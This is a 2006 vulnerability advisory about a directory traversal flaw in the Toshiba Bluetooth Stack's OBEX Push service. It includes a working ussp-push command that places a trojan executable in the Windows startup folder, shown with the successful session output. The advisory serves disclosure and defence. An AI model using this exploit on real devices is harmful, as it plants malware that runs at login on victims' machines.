DMA-2006-0112a.txt

`DMA[2006-0112a] - 'Toshiba Bluetooth Stack Directory Transversal'  
Author: Kevin Finisterre  
Vendor: http://www.toshiba-tro.de/  
Product: 'Toshiba Bluetooth Stack <=v4.00.23(T)'  
References:   
http://www.digitalmunition.com/DMA[2006-0112a].txt  
  
Description:   
Toshiba was one of the first companies to provide a working Bluetooth PC stack supporting   
the v1.2 specification. In March 2004 Fujitsu made available their LifeBook S7010 mobile   
computer qualified compliant with Toshiba's stack becoming the first available BT v1.2 device.   
Toshiba's licensing of its stack has provided an advantage to partners looking to support the   
new specification.  
  
Until recently when a few co-workers purchased Dell XPS M170 laptops with internal TrueMobile   
350 Bluetooth modules, I had not actually seen the Toshiba stack deployed. I assume the reason   
I have not seen it anywhere is due to the fact that Widcomm still seems to dominate the market.   
  
After leaving the office I searched for more information on the Toshiba stack and wound up   
downloading a copy from the Bluetooth SIG website. Build20050512_v3031C-30Days.zip was and may   
still be distributed at http://www.bluetooth.org. Since notifying Toshiba of the issue I have   
been unable to locate this file on the SIG website.  
  
Both the version 3.x binary provided by the SIG as well as a version 4.x binary that I downloaded   
from http://aps.toshiba-tro.de/bluetooth/pages/download.php were tested and found to be vulnerable   
to simple ../ style attacks in their OBEX Push services. Further testing also confirmed the Dell  
driver was also exploitable. http://ftp.us.dell.com/network/R112482.EXE is Toshiba Stack v4.00.11.  
  
Using ussp-push an attacker can place a trojaned file anywhere on the filesystem. This attack will  
require the user to accept the connection request. Upon being prompted to accept the request the   
user is asked where the downloaded file should be placed. Regardless of the user specified path an   
attacker can place the anywhere that the user has permission to write. During the connection   
request no filename is presented so the person being attacked has no real indication that something   
malicious is occurring.   
  
animosity:/home/kfinisterre/ussp-push-0.5# ./ussp-push   
00:11:B1:07:BE:A7@4 trojan.exe ..\\..\\..\\..\\..\\windows\\startup\\pwned.exe  
pushing file trojan.exe  
name=trojan.exe, size=18009  
Registered transport  
  
set user data  
  
created new objext  
Local device 00:0A:3A:54:71:95  
Remote device 00:11:B1:07:BE:A7 (4)  
  
started a new request  
reqdone  
Command (00) has now finished, rsp: 20Connected!  
  
Connection return code: 0, id: 0  
Connection established  
connected to server  
Sending file: ..\..\..\..\..\windows\startup\pwned.exe, path: trojan.exe, size: 18009  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
Made some progress...  
reqdone  
Command (02) has now finished, rsp: 20reqdone  
Command (01) has now finished, rsp: 20Disconnect done!pushed!!  
  
Work Around:   
Do not accept connection requests from unknown sources. Wait for proper vendor response and   
updates. Multiple attempts to inform the vendor about this issue were made however I was unable   
to maintain a dialog with anyone that would respond to email. Further questions about this issue   
should be directed to the Toshiba support staff or your hardware manufacturer.   
  
  
  
  
  
  
  
`